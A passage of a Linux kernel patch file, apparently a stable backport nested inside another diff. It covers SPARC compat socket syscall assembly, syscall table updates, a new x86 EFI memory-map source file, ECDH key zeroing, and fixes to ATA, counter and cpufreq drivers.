+-40:	lduwa		[%o1 + 0x8] %asi, %o2
+-41:	lduwa		[%o1 + 0xc] %asi, %o3
+-42:	lduwa		[%o1 + 0x10] %asi, %o4
+-43:	lduwa		[%o1 + 0x14] %asi, %o5
+-	jmpl		%g1 + %lo(sys_recvfrom), %g0
+-44:	 lduwa		[%o1 + 0x4] %asi, %o1
+-do_sys_shutdown: /* sys_shutdown(int, int) */
+-45:	ldswa		[%o1 + 0x0] %asi, %o0
+-	sethi		%hi(sys_shutdown), %g1
+-	jmpl		%g1 + %lo(sys_shutdown), %g0
+-46:	 ldswa		[%o1 + 0x4] %asi, %o1
+-	nop
+-	nop
+-	nop
+-	nop
+-do_sys_setsockopt: /* sys_setsockopt(int, int, int, char *, int) */
+-47:	ldswa		[%o1 + 0x0] %asi, %o0
+-	sethi		%hi(sys_setsockopt), %g1
+-48:	ldswa		[%o1 + 0x8] %asi, %o2
+-49:	lduwa		[%o1 + 0xc] %asi, %o3
+-50:	ldswa		[%o1 + 0x10] %asi, %o4
+-	jmpl		%g1 + %lo(sys_setsockopt), %g0
+-51:	 ldswa		[%o1 + 0x4] %asi, %o1
+-	nop
+-do_sys_getsockopt: /* sys_getsockopt(int, int, int, u32, u32) */
+-52:	ldswa		[%o1 + 0x0] %asi, %o0
+-	sethi		%hi(sys_getsockopt), %g1
+-53:	ldswa		[%o1 + 0x8] %asi, %o2
+-54:	lduwa		[%o1 + 0xc] %asi, %o3
+-55:	lduwa		[%o1 + 0x10] %asi, %o4
+-	jmpl		%g1 + %lo(sys_getsockopt), %g0
+-56:	 ldswa		[%o1 + 0x4] %asi, %o1
+-	nop
+-do_sys_sendmsg: /* compat_sys_sendmsg(int, struct compat_msghdr *, unsigned int) */
+-57:	ldswa		[%o1 + 0x0] %asi, %o0
+-	sethi		%hi(compat_sys_sendmsg), %g1
+-58:	lduwa		[%o1 + 0x8] %asi, %o2
+-	jmpl		%g1 + %lo(compat_sys_sendmsg), %g0
+-59:	 lduwa		[%o1 + 0x4] %asi, %o1
+-	nop
+-	nop
+-	nop
+-do_sys_recvmsg: /* compat_sys_recvmsg(int, struct compat_msghdr *, unsigned int) */
+-60:	ldswa		[%o1 + 0x0] %asi, %o0
+-	sethi		%hi(compat_sys_recvmsg), %g1
+-61:	lduwa		[%o1 + 0x8] %asi, %o2
+-	jmpl		%g1 + %lo(compat_sys_recvmsg), %g0
+-62:	 lduwa		[%o1 + 0x4] %asi, %o1
+-	nop
+-	nop
+-	nop
+-do_sys_accept4: /* sys_accept4(int, struct sockaddr *, int *, int) */
+-63:	ldswa		[%o1 + 0x0] %asi, %o0
+-	sethi		%hi(sys_accept4), %g1
+-64:	lduwa		[%o1 + 0x8] %asi, %o2
+-65:	ldswa		[%o1 + 0xc] %asi, %o3
+-	jmpl		%g1 + %lo(sys_accept4), %g0
+-66:	 lduwa		[%o1 + 0x4] %asi, %o1
+-	nop
+-	nop
+-
+-	.section	__ex_table,"a"
+-	.align		4
+-	.word		1b, __retl_efault, 2b, __retl_efault
+-	.word		3b, __retl_efault, 4b, __retl_efault
+-	.word		5b, __retl_efault, 6b, __retl_efault
+-	.word		7b, __retl_efault, 8b, __retl_efault
+-	.word		9b, __retl_efault, 10b, __retl_efault
+-	.word		11b, __retl_efault, 12b, __retl_efault
+-	.word		13b, __retl_efault, 14b, __retl_efault
+-	.word		15b, __retl_efault, 16b, __retl_efault
+-	.word		17b, __retl_efault, 18b, __retl_efault
+-	.word		19b, __retl_efault, 20b, __retl_efault
+-	.word		21b, __retl_efault, 22b, __retl_efault
+-	.word		23b, __retl_efault, 24b, __retl_efault
+-	.word		25b, __retl_efault, 26b, __retl_efault
+-	.word		27b, __retl_efault, 28b, __retl_efault
+-	.word		29b, __retl_efault, 30b, __retl_efault
+-	.word		31b, __retl_efault, 32b, __retl_efault
+-	.word		33b, __retl_efault, 34b, __retl_efault
+-	.word		35b, __retl_efault, 36b, __retl_efault
+-	.word		37b, __retl_efault, 38b, __retl_efault
+-	.word		39b, __retl_efault, 40b, __retl_efault
+-	.word		41b, __retl_efault, 42b, __retl_efault
+-	.word		43b, __retl_efault, 44b, __retl_efault
+-	.word		45b, __retl_efault, 46b, __retl_efault
+-	.word		47b, __retl_efault, 48b, __retl_efault
+-	.word		49b, __retl_efault, 50b, __retl_efault
+-	.word		51b, __retl_efault, 52b, __retl_efault
+-	.word		53b, __retl_efault, 54b, __retl_efault
+-	.word		55b, __retl_efault, 56b, __retl_efault
+-	.word		57b, __retl_efault, 58b, __retl_efault
+-	.word		59b, __retl_efault, 60b, __retl_efault
+-	.word		61b, __retl_efault, 62b, __retl_efault
+-	.word		63b, __retl_efault, 64b, __retl_efault
+-	.word		65b, __retl_efault, 66b, __retl_efault
+-	.previous
+diff --git a/arch/sparc/kernel/syscalls/syscall.tbl b/arch/sparc/kernel/syscalls/syscall.tbl
+index 4398cc6fb68dd..0ddddd3e38c08 100644
+--- a/arch/sparc/kernel/syscalls/syscall.tbl
++++ b/arch/sparc/kernel/syscalls/syscall.tbl
+@@ -117,7 +117,7 @@
+ 90	common	dup2			sys_dup2
+ 91	32	setfsuid32		sys_setfsuid
+ 92	common	fcntl			sys_fcntl			compat_sys_fcntl
+-93	common	select			sys_select
++93	common	select			sys_select			compat_sys_select
+ 94	32	setfsgid32		sys_setfsgid
+ 95	common	fsync			sys_fsync
+ 96	common	setpriority		sys_setpriority
+@@ -155,7 +155,7 @@
+ 123	32	fchown			sys_fchown16
+ 123	64	fchown			sys_fchown
+ 124	common	fchmod			sys_fchmod
+-125	common	recvfrom		sys_recvfrom
++125	common	recvfrom		sys_recvfrom			compat_sys_recvfrom
+ 126	32	setreuid		sys_setreuid16
+ 126	64	setreuid		sys_setreuid
+ 127	32	setregid		sys_setregid16
+@@ -247,7 +247,7 @@
+ 204	32	readdir			sys_old_readdir			compat_sys_old_readdir
+ 204	64	readdir			sys_nis_syscall
+ 205	common	readahead		sys_readahead			compat_sys_readahead
+-206	common	socketcall		sys_socketcall			sys32_socketcall
++206	common	socketcall		sys_socketcall			compat_sys_socketcall
+ 207	common	syslog			sys_syslog
+ 208	common	lookup_dcookie		sys_lookup_dcookie		compat_sys_lookup_dcookie
+ 209	common	fadvise64		sys_fadvise64			compat_sys_fadvise64
+@@ -461,7 +461,7 @@
+ 412	32	utimensat_time64		sys_utimensat			sys_utimensat
+ 413	32	pselect6_time64			sys_pselect6			compat_sys_pselect6_time64
+ 414	32	ppoll_time64			sys_ppoll			compat_sys_ppoll_time64
+-416	32	io_pgetevents_time64		sys_io_pgetevents		sys_io_pgetevents
++416	32	io_pgetevents_time64		sys_io_pgetevents		compat_sys_io_pgetevents_time64
+ 417	32	recvmmsg_time64			sys_recvmmsg			compat_sys_recvmmsg_time64
+ 418	32	mq_timedsend_time64		sys_mq_timedsend		sys_mq_timedsend
+ 419	32	mq_timedreceive_time64		sys_mq_timedreceive		sys_mq_timedreceive
+diff --git a/arch/x86/entry/syscalls/syscall_32.tbl b/arch/x86/entry/syscalls/syscall_32.tbl
+index 320480a8db4f8..81e60b37128fd 100644
+--- a/arch/x86/entry/syscalls/syscall_32.tbl
++++ b/arch/x86/entry/syscalls/syscall_32.tbl
+@@ -420,7 +420,7 @@
+ 412	i386	utimensat_time64	sys_utimensat
+ 413	i386	pselect6_time64		sys_pselect6			compat_sys_pselect6_time64
+ 414	i386	ppoll_time64		sys_ppoll			compat_sys_ppoll_time64
+-416	i386	io_pgetevents_time64	sys_io_pgetevents
++416	i386	io_pgetevents_time64	sys_io_pgetevents		compat_sys_io_pgetevents_time64
+ 417	i386	recvmmsg_time64		sys_recvmmsg			compat_sys_recvmmsg_time64
+ 418	i386	mq_timedsend_time64	sys_mq_timedsend
+ 419	i386	mq_timedreceive_time64	sys_mq_timedreceive
+diff --git a/arch/x86/include/asm/efi.h b/arch/x86/include/asm/efi.h
+index e601264b1a243..5f1ff78cf5e3f 100644
+--- a/arch/x86/include/asm/efi.h
++++ b/arch/x86/include/asm/efi.h
+@@ -416,6 +416,17 @@ static inline void efi_fake_memmap_early(void)
+ }
+ #endif
+ 
++extern int __init efi_memmap_alloc(unsigned int num_entries,
++				   struct efi_memory_map_data *data);
++extern void __efi_memmap_free(u64 phys, unsigned long size,
++			      unsigned long flags);
++
++extern int __init efi_memmap_install(struct efi_memory_map_data *data);
++extern int __init efi_memmap_split_count(efi_memory_desc_t *md,
++					 struct range *range);
++extern void __init efi_memmap_insert(struct efi_memory_map *old_memmap,
++				     void *buf, struct efi_mem_range *mem);
++
+ #define arch_ima_efi_boot_mode	\
+ 	({ extern struct boot_params boot_params; boot_params.secure_boot; })
+ 
+diff --git a/arch/x86/include/asm/entry-common.h b/arch/x86/include/asm/entry-common.h
+index ffe72790ceafd..ebdf5c97f53a8 100644
+--- a/arch/x86/include/asm/entry-common.h
++++ b/arch/x86/include/asm/entry-common.h
+@@ -73,19 +73,16 @@ static inline void arch_exit_to_user_mode_prepare(struct pt_regs *regs,
+ #endif
+ 
+ 	/*
+-	 * Ultimately, this value will get limited by KSTACK_OFFSET_MAX(),
+-	 * but not enough for x86 stack utilization comfort. To keep
+-	 * reasonable stack head room, reduce the maximum offset to 8 bits.
+-	 *
+-	 * The actual entropy will be further reduced by the compiler when
+-	 * applying stack alignment constraints (see cc_stack_align4/8 in
++	 * This value will get limited by KSTACK_OFFSET_MAX(), which is 10
++	 * bits. The actual entropy will be further reduced by the compiler
++	 * when applying stack alignment constraints (see cc_stack_align4/8 in
+ 	 * arch/x86/Makefile), which will remove the 3 (x86_64) or 2 (ia32)
+ 	 * low bits from any entropy chosen here.
+ 	 *
+-	 * Therefore, final stack offset entropy will be 5 (x86_64) or
+-	 * 6 (ia32) bits.
++	 * Therefore, final stack offset entropy will be 7 (x86_64) or
++	 * 8 (ia32) bits.
+ 	 */
+-	choose_random_kstack_offset(rdtsc() & 0xFF);
++	choose_random_kstack_offset(rdtsc());
+ }
+ #define arch_exit_to_user_mode_prepare arch_exit_to_user_mode_prepare
+ 
+diff --git a/arch/x86/kernel/fpu/core.c b/arch/x86/kernel/fpu/core.c
+index 1d190761d00fd..f1446f532b17b 100644
+--- a/arch/x86/kernel/fpu/core.c
++++ b/arch/x86/kernel/fpu/core.c
+@@ -145,8 +145,8 @@ void restore_fpregs_from_fpstate(struct fpstate *fpstate, u64 mask)
+ 		asm volatile(
+ 			"fnclex\n\t"
+ 			"emms\n\t"
+-			"fildl %P[addr]"	/* set F?P to defined value */
+-			: : [addr] "m" (fpstate));
++			"fildl %[addr]"	/* set F?P to defined value */
++			: : [addr] "m" (*fpstate));
+ 	}
+ 
+ 	if (use_xsave()) {
+diff --git a/arch/x86/kernel/time.c b/arch/x86/kernel/time.c
+index e42faa792c079..52e1f3f0b361c 100644
+--- a/arch/x86/kernel/time.c
++++ b/arch/x86/kernel/time.c
+@@ -27,25 +27,7 @@
+ 
+ unsigned long profile_pc(struct pt_regs *regs)
+ {
+-	unsigned long pc = instruction_pointer(regs);
+-
+-	if (!user_mode(regs) && in_lock_functions(pc)) {
+-#ifdef CONFIG_FRAME_POINTER
+-		return *(unsigned long *)(regs->bp + sizeof(long));
+-#else
+-		unsigned long *sp = (unsigned long *)regs->sp;
+-		/*
+-		 * Return address is either directly at stack pointer
+-		 * or above a saved flags. Eflags has bits 22-31 zero,
+-		 * kernel addresses don't.
+-		 */
+-		if (sp[0] >> 22)
+-			return sp[0];
+-		if (sp[1] >> 22)
+-			return sp[1];
+-#endif
+-	}
+-	return pc;
++	return instruction_pointer(regs);
+ }
+ EXPORT_SYMBOL(profile_pc);
+ 
+diff --git a/arch/x86/platform/efi/Makefile b/arch/x86/platform/efi/Makefile
+index a502451576859..4bd708c037e10 100644
+--- a/arch/x86/platform/efi/Makefile
++++ b/arch/x86/platform/efi/Makefile
+@@ -2,5 +2,6 @@
+ KASAN_SANITIZE := n
+ GCOV_PROFILE := n
+ 
+-obj-$(CONFIG_EFI) 		+= quirks.o efi.o efi_$(BITS).o efi_stub_$(BITS).o
++obj-$(CONFIG_EFI) 		+= memmap.o quirks.o efi.o efi_$(BITS).o \
++				   efi_stub_$(BITS).o
+ obj-$(CONFIG_EFI_MIXED)		+= efi_thunk_$(BITS).o
+diff --git a/arch/x86/platform/efi/efi.c b/arch/x86/platform/efi/efi.c
+index ebc98a68c4005..7e51c14a1ef06 100644
+--- a/arch/x86/platform/efi/efi.c
++++ b/arch/x86/platform/efi/efi.c
+@@ -214,9 +214,11 @@ int __init efi_memblock_x86_reserve_range(void)
+ 	data.desc_size		= e->efi_memdesc_size;
+ 	data.desc_version	= e->efi_memdesc_version;
+ 
+-	rv = efi_memmap_init_early(&data);
+-	if (rv)
+-		return rv;
++	if (!efi_enabled(EFI_PARAVIRT)) {
++		rv = efi_memmap_init_early(&data);
++		if (rv)
++			return rv;
++	}
+ 
+ 	if (add_efi_memmap || do_efi_soft_reserve())
+ 		do_add_efi_memmap();
+diff --git a/arch/x86/platform/efi/memmap.c b/arch/x86/platform/efi/memmap.c
+new file mode 100644
+index 0000000000000..93baffd443fea
+--- /dev/null
++++ b/arch/x86/platform/efi/memmap.c
+@@ -0,0 +1,249 @@
++// SPDX-License-Identifier: GPL-2.0
++/*
++ * Common EFI memory map functions.
++ */
++
++#define pr_fmt(fmt) "efi: " fmt
++
++#include <linux/init.h>
++#include <linux/kernel.h>
++#include <linux/efi.h>
++#include <linux/io.h>
++#include <asm/early_ioremap.h>
++#include <asm/efi.h>
++#include <linux/memblock.h>
++#include <linux/slab.h>
++
++static phys_addr_t __init __efi_memmap_alloc_early(unsigned long size)
++{
++	return memblock_phys_alloc(size, SMP_CACHE_BYTES);
++}
++
++static phys_addr_t __init __efi_memmap_alloc_late(unsigned long size)
++{
++	unsigned int order = get_order(size);
++	struct page *p = alloc_pages(GFP_KERNEL, order);
++
++	if (!p)
++		return 0;
++
++	return PFN_PHYS(page_to_pfn(p));
++}
++
++void __init __efi_memmap_free(u64 phys, unsigned long size, unsigned long flags)
++{
++	if (flags & EFI_MEMMAP_MEMBLOCK) {
++		if (slab_is_available())
++			memblock_free_late(phys, size);
++		else
++			memblock_phys_free(phys, size);
++	} else if (flags & EFI_MEMMAP_SLAB) {
++		struct page *p = pfn_to_page(PHYS_PFN(phys));
++		unsigned int order = get_order(size);
++
++		free_pages((unsigned long) page_address(p), order);
++	}
++}
++
++/**
++ * efi_memmap_alloc - Allocate memory for the EFI memory map
++ * @num_entries: Number of entries in the allocated map.
++ * @data: efi memmap installation parameters
++ *
++ * Depending on whether mm_init() has already been invoked or not,
++ * either memblock or "normal" page allocation is used.
++ *
++ * Returns zero on success, a negative error code on failure.
++ */
++int __init efi_memmap_alloc(unsigned int num_entries,
++		struct efi_memory_map_data *data)
++{
++	/* Expect allocation parameters are zero initialized */
++	WARN_ON(data->phys_map || data->size);
++
++	data->size = num_entries * efi.memmap.desc_size;
++	data->desc_version = efi.memmap.desc_version;
++	data->desc_size = efi.memmap.desc_size;
++	data->flags &= ~(EFI_MEMMAP_SLAB | EFI_MEMMAP_MEMBLOCK);
++	data->flags |= efi.memmap.flags & EFI_MEMMAP_LATE;
++
++	if (slab_is_available()) {
++		data->flags |= EFI_MEMMAP_SLAB;
++		data->phys_map = __efi_memmap_alloc_late(data->size);
++	} else {
++		data->flags |= EFI_MEMMAP_MEMBLOCK;
++		data->phys_map = __efi_memmap_alloc_early(data->size);
++	}
++
++	if (!data->phys_map)
++		return -ENOMEM;
++	return 0;
++}
++
++/**
++ * efi_memmap_install - Install a new EFI memory map in efi.memmap
++ * @ctx: map allocation parameters (address, size, flags)
++ *
++ * Unlike efi_memmap_init_*(), this function does not allow the caller
++ * to switch from early to late mappings. It simply uses the existing
++ * mapping function and installs the new memmap.
++ *
++ * Returns zero on success, a negative error code on failure.
++ */
++int __init efi_memmap_install(struct efi_memory_map_data *data)
++{
++	unsigned long size = efi.memmap.desc_size * efi.memmap.nr_map;
++	unsigned long flags = efi.memmap.flags;
++	u64 phys = efi.memmap.phys_map;
++	int ret;
++
++	efi_memmap_unmap();
++
++	if (efi_enabled(EFI_PARAVIRT))
++		return 0;
++
++	ret = __efi_memmap_init(data);
++	if (ret)
++		return ret;
++
++	__efi_memmap_free(phys, size, flags);
++	return 0;
++}
++
++/**
++ * efi_memmap_split_count - Count number of additional EFI memmap entries
++ * @md: EFI memory descriptor to split
++ * @range: Address range (start, end) to split around
++ *
++ * Returns the number of additional EFI memmap entries required to
++ * accommodate @range.
++ */
++int __init efi_memmap_split_count(efi_memory_desc_t *md, struct range *range)
++{
++	u64 m_start, m_end;
++	u64 start, end;
++	int count = 0;
++
++	start = md->phys_addr;
++	end = start + (md->num_pages << EFI_PAGE_SHIFT) - 1;
++
++	/* modifying range */
++	m_start = range->start;
++	m_end = range->end;
++
++	if (m_start <= start) {
++		/* split into 2 parts */
++		if (start < m_end && m_end < end)
++			count++;
++	}
++
++	if (start < m_start && m_start < end) {
++		/* split into 3 parts */
++		if (m_end < end)
++			count += 2;
++		/* split into 2 parts */
++		if (end <= m_end)
++			count++;
++	}
++
++	return count;
++}
++
++/**
++ * efi_memmap_insert - Insert a memory region in an EFI memmap
++ * @old_memmap: The existing EFI memory map structure
++ * @buf: Address of buffer to store new map
++ * @mem: Memory map entry to insert
++ *
++ * It is suggested that you call efi_memmap_split_count() first
++ * to see how large @buf needs to be.
++ */
++void __init efi_memmap_insert(struct efi_memory_map *old_memmap, void *buf,
++			      struct efi_mem_range *mem)
++{
++	u64 m_start, m_end, m_attr;
++	efi_memory_desc_t *md;
++	u64 start, end;
++	void *old, *new;
++
++	/* modifying range */
++	m_start = mem->range.start;
++	m_end = mem->range.end;
++	m_attr = mem->attribute;
++
++	/*
++	 * The EFI memory map deals with regions in EFI_PAGE_SIZE
++	 * units. Ensure that the region described by 'mem' is aligned
++	 * correctly.
++	 */
++	if (!IS_ALIGNED(m_start, EFI_PAGE_SIZE) ||
++	    !IS_ALIGNED(m_end + 1, EFI_PAGE_SIZE)) {
++		WARN_ON(1);
++		return;
++	}
++
++	for (old = old_memmap->map, new = buf;
++	     old < old_memmap->map_end;
++	     old += old_memmap->desc_size, new += old_memmap->desc_size) {
++
++		/* copy original EFI memory descriptor */
++		memcpy(new, old, old_memmap->desc_size);
++		md = new;
++		start = md->phys_addr;
++		end = md->phys_addr + (md->num_pages << EFI_PAGE_SHIFT) - 1;
++
++		if (m_start <= start && end <= m_end)
++			md->attribute |= m_attr;
++
++		if (m_start <= start &&
++		    (start < m_end && m_end < end)) {
++			/* first part */
++			md->attribute |= m_attr;
++			md->num_pages = (m_end - md->phys_addr + 1) >>
++				EFI_PAGE_SHIFT;
++			/* latter part */
++			new += old_memmap->desc_size;
++			memcpy(new, old, old_memmap->desc_size);
++			md = new;
++			md->phys_addr = m_end + 1;
++			md->num_pages = (end - md->phys_addr + 1) >>
++				EFI_PAGE_SHIFT;
++		}
++
++		if ((start < m_start && m_start < end) && m_end < end) {
++			/* first part */
++			md->num_pages = (m_start - md->phys_addr) >>
++				EFI_PAGE_SHIFT;
++			/* middle part */
++			new += old_memmap->desc_size;
++			memcpy(new, old, old_memmap->desc_size);
++			md = new;
++			md->attribute |= m_attr;
++			md->phys_addr = m_start;
++			md->num_pages = (m_end - m_start + 1) >>
++				EFI_PAGE_SHIFT;
++			/* last part */
++			new += old_memmap->desc_size;
++			memcpy(new, old, old_memmap->desc_size);
++			md = new;
++			md->phys_addr = m_end + 1;
++			md->num_pages = (end - m_end) >>
++				EFI_PAGE_SHIFT;
++		}
++
++		if ((start < m_start && m_start < end) &&
++		    (end <= m_end)) {
++			/* first part */
++			md->num_pages = (m_start - md->phys_addr) >>
++				EFI_PAGE_SHIFT;
++			/* latter part */
++			new += old_memmap->desc_size;
++			memcpy(new, old, old_memmap->desc_size);
++			md = new;
++			md->phys_addr = m_start;
++			md->num_pages = (end - md->phys_addr + 1) >>
++				EFI_PAGE_SHIFT;
++			md->attribute |= m_attr;
++		}
++	}
++}
+diff --git a/crypto/ecdh.c b/crypto/ecdh.c
+index 80afee3234fbe..3049f147e0117 100644
+--- a/crypto/ecdh.c
++++ b/crypto/ecdh.c
+@@ -33,6 +33,8 @@ static int ecdh_set_secret(struct crypto_kpp *tfm, const void *buf,
+ 	    params.key_size > sizeof(u64) * ctx->ndigits)
+ 		return -EINVAL;
+ 
++	memset(ctx->private_key, 0, sizeof(ctx->private_key));
++
+ 	if (!params.key || !params.key_size)
+ 		return ecc_gen_privkey(ctx->curve_id, ctx->ndigits,
+ 				       ctx->private_key);
+diff --git a/drivers/acpi/x86/utils.c b/drivers/acpi/x86/utils.c
+index e45285d4e62a4..d0257758cf989 100644
+--- a/drivers/acpi/x86/utils.c
++++ b/drivers/acpi/x86/utils.c
+@@ -188,16 +188,16 @@ bool acpi_device_override_status(struct acpi_device *adev, unsigned long long *s
+ }
+ 
+ /*
+- * AMD systems from Renoir and Lucienne *require* that the NVME controller
++ * AMD systems from Renoir onwards *require* that the NVME controller
+  * is put into D3 over a Modern Standby / suspend-to-idle cycle.
+  *
+  * This is "typically" accomplished using the `StorageD3Enable`
+  * property in the _DSD that is checked via the `acpi_storage_d3` function
+- * but this property was introduced after many of these systems launched
+- * and most OEM systems don't have it in their BIOS.
++ * but some OEM systems still don't have it in their BIOS.
+  *
+  * The Microsoft documentation for StorageD3Enable mentioned that Windows has
+- * a hardcoded allowlist for D3 support, which was used for these platforms.
++ * a hardcoded allowlist for D3 support as well as a registry key to override
++ * the BIOS, which has been used for these cases.
+  *
+  * This allows quirking on Linux in a similar fashion.
+  *
+@@ -210,18 +210,15 @@ bool acpi_device_override_status(struct acpi_device *adev, unsigned long long *s
+  *    https://bugzilla.kernel.org/show_bug.cgi?id=216773
+  *    https://bugzilla.kernel.org/show_bug.cgi?id=217003
+  * 2) On at least one HP system StorageD3Enable is missing on the second NVME
+-      disk in the system.
++ *    disk in the system.
++ * 3) On at least one HP Rembrandt system StorageD3Enable is missing on the only
++ *    NVME device.
+  */
+-static const struct x86_cpu_id storage_d3_cpu_ids[] = {
+-	X86_MATCH_VENDOR_FAM_MODEL(AMD, 23, 96, NULL),	/* Renoir */
+-	X86_MATCH_VENDOR_FAM_MODEL(AMD, 23, 104, NULL),	/* Lucienne */
+-	X86_MATCH_VENDOR_FAM_MODEL(AMD, 25, 80, NULL),	/* Cezanne */
+-	{}
+-};
+-
+ bool force_storage_d3(void)
+ {
+-	return x86_match_cpu(storage_d3_cpu_ids);
++	if (!cpu_feature_enabled(X86_FEATURE_ZEN))
++		return false;
++	return acpi_gbl_FADT.flags & ACPI_FADT_LOW_POWER_S0;
+ }
+ 
+ /*
+diff --git a/drivers/ata/ahci.c b/drivers/ata/ahci.c
+index 17119e8dc8c30..20f53ae4d204e 100644
+--- a/drivers/ata/ahci.c
++++ b/drivers/ata/ahci.c
+@@ -1891,8 +1891,10 @@ static int ahci_init_one(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	n_ports = max(ahci_nr_ports(hpriv->cap), fls(hpriv->port_map));
+ 
+ 	host = ata_host_alloc_pinfo(&pdev->dev, ppi, n_ports);
+-	if (!host)
+-		return -ENOMEM;
++	if (!host) {
++		rc = -ENOMEM;
++		goto err_rm_sysfs_file;
++	}
+ 	host->private_data = hpriv;
+ 
+ 	if (ahci_init_msi(pdev, n_ports, hpriv) < 0) {
+@@ -1945,11 +1947,11 @@ static int ahci_init_one(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	/* initialize adapter */
+ 	rc = ahci_configure_dma_masks(pdev, hpriv);
+ 	if (rc)
+-		return rc;
++		goto err_rm_sysfs_file;
+ 
+ 	rc = ahci_pci_reset_controller(host);
+ 	if (rc)
+-		return rc;
++		goto err_rm_sysfs_file;
+ 
+ 	ahci_pci_init_controller(host);
+ 	ahci_pci_print_info(host);
+@@ -1958,10 +1960,15 @@ static int ahci_init_one(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 
+ 	rc = ahci_host_activate(host, &ahci_sht);
+ 	if (rc)
+-		return rc;
++		goto err_rm_sysfs_file;
+ 
+ 	pm_runtime_put_noidle(&pdev->dev);
+ 	return 0;
++
++err_rm_sysfs_file:
++	sysfs_remove_file_from_group(&pdev->dev.kobj,
++				     &dev_attr_remapped_nvme.attr, NULL);
++	return rc;
+ }
+ 
+ static void ahci_shutdown_one(struct pci_dev *pdev)
+diff --git a/drivers/ata/libata-core.c b/drivers/ata/libata-core.c
+index f14e56a5cff6b..5a13630034ef7 100644
+--- a/drivers/ata/libata-core.c
++++ b/drivers/ata/libata-core.c
+@@ -5523,8 +5523,10 @@ struct ata_host *ata_host_alloc(struct device *dev, int max_ports)
+ 	if (!host)
+ 		return NULL;
+ 
+-	if (!devres_open_group(dev, NULL, GFP_KERNEL))
+-		goto err_free;
++	if (!devres_open_group(dev, NULL, GFP_KERNEL)) {
++		kfree(host);
++		return NULL;
++	}
+ 
+ 	dr = devres_alloc(ata_devres_release, 0, GFP_KERNEL);
+ 	if (!dr)
+@@ -5556,8 +5558,6 @@ struct ata_host *ata_host_alloc(struct device *dev, int max_ports)
+ 
+  err_out:
+ 	devres_release_group(dev, NULL);
+- err_free:
+-	kfree(host);
+ 	return NULL;
+ }
+ EXPORT_SYMBOL_GPL(ata_host_alloc);
+diff --git a/drivers/counter/ti-eqep.c b/drivers/counter/ti-eqep.c
+index b0f24cf3e891d..4d3de4a35801f 100644
+--- a/drivers/counter/ti-eqep.c
++++ b/drivers/counter/ti-eqep.c
+@@ -6,6 +6,7 @@
+  */
+ 
+ #include <linux/bitops.h>
++#include <linux/clk.h>
+ #include <linux/counter.h>
+ #include <linux/kernel.h>
+ #include <linux/mod_devicetable.h>
+@@ -376,6 +377,7 @@ static int ti_eqep_probe(struct platform_device *pdev)
+ 	struct counter_device *counter;
+ 	struct ti_eqep_cnt *priv;
+ 	void __iomem *base;
++	struct clk *clk;
+ 	int err;
+ 
+ 	counter = devm_counter_alloc(dev, sizeof(*priv));
+@@ -415,6 +417,10 @@ static int ti_eqep_probe(struct platform_device *pdev)
+ 	pm_runtime_enable(dev);
+ 	pm_runtime_get_sync(dev);
+ 
++	clk = devm_clk_get_enabled(dev, NULL);
++	if (IS_ERR(clk))
++		return dev_err_probe(dev, PTR_ERR(clk), "failed to enable clock\n");
++
+ 	err = counter_add(counter);
+ 	if (err < 0) {
+ 		pm_runtime_put_sync(dev);
+diff --git a/drivers/cpufreq/amd-pstate.c b/drivers/cpufreq/amd-pstate.c
+index 9f147e9eafb63..90dcf26f09731 100644
+--- a/drivers/cpufreq/amd-pstate.c
++++ b/drivers/cpufreq/amd-pstate.c
+@@ -424,7 +424,7 @@ static int amd_pstate_set_boost(struct cpufreq_policy *policy, int state)
+ 	if (state)
+ 		policy->cpuinfo.max_freq = cpudata->max_freq;
+ 	else
+-		policy->cpuinfo.max_freq = cpudata->nominal_freq * 1000;
++		policy->cpuinfo.max_freq = cpudata->nominal_freq;
+ 
+ 	policy->max = policy->cpuinfo.max_freq;
+ 
+diff --git a/drivers/cpufreq/intel_pstate.c b/drivers/cpufreq/intel_pstate.c
+index 5771f3fc6115d..4abda800c632d 100644
+--- a/drivers/cpufreq/intel_pstate.c
++++ b/drivers/cpufreq/intel_pstate.c
+@@ -348,15 +348,14 @@ static void intel_pstate_set_itmt_prio(int cpu)
+ 	int ret;
+ 
+ 	ret = cppc_get_perf_caps(cpu, &cppc_perf);
+-	if (ret)
+-		return;
+-
+ 	/*
+-	 * On some systems with overclocking enabled, CPPC.highest_perf is hardcoded to 0xff.
+-	 * In this case we can't use CPPC.highest_perf to enable ITMT.
+-	 * In this case we can look at MSR_HWP_CAPABILITIES bits [8:0] to decide.
++	 * If CPPC is not available, fall back to MSR_HWP_CAPABILITIES bits [8:0].
++	 *
++	 * Also, on some systems with overclocking enabled, CPPC.highest_perf is
++	 * hardcoded to 0xff, so CPPC.highest_perf cannot be used to enable ITMT.
++	 * Fall back to MSR_HWP_CAPABILITIES then too.
+ 	 */
+-	if (cppc_perf.highest_perf == CPPC_MAX_PERF)
++	if (ret || cppc_perf.highest_perf == CPPC_MAX_PERF)
+ 		cppc_perf.highest_perf = HWP_HIGHEST_PERF(READ_ONCE(all_cpu_data[cpu]->hwp_cap_cached));
+ 
+ 	/*
+diff --git a/drivers/firmware/efi/fdtparams.c b/drivers/firmware/efi/fdtparams.c
+index e901f8564ca0c..0ec83ba580972 100644
+--- a/drivers/firmware/efi/fdtparams.c
++++ b/drivers/firmware/efi/fdtparams.c
+@@ -30,11 +30,13 @@ static __initconst const char name[][22] = {
+ 
+ static __initconst const struct {
+ 	const char	path[17];
++	u8		paravirt;
+ 	const char	params[PARAMCOUNT][26];
+ } dt_params[] = {
+ 	{
+ #ifdef CONFIG_XEN    //  <-------17------>
+ 		.path = "/hypervisor/uefi",
++		.paravirt = 1,
+ 		.params = {
+ 			[SYSTAB] = "xen,uefi-system-table",
+ 			[MMBASE] = "xen,uefi-mmap-start",
+@@ -121,6 +123,8 @@ u64 __init efi_get_fdt_params(struct efi_memory_map_data *mm)
+ 			pr_err("Can't find property '%s' in DT!\n", pname);
+ 			return 0;
+ 		}
++		if (dt_params[i].paravirt)
++			set_bit(EFI_PARAVIRT, &efi.flags);
+ 		return systab;
+ 	}
+ notfound:
+diff --git a/drivers/firmware/efi/memmap.c b/drivers/firmware/efi/memmap.c
+index 6ec7970dbd40a..77dd20f9df312 100644
+--- a/drivers/firmware/efi/memmap.c
++++ b/drivers/firmware/efi/memmap.c
+@@ -9,82 +9,11 @@
+ #include <linux/kernel.h>
+ #include <linux/efi.h>
+ #include <linux/io.h>
+-#include <asm/early_ioremap.h>
+ #include <linux/memblock.h>
+ #include <linux/slab.h>
+ 
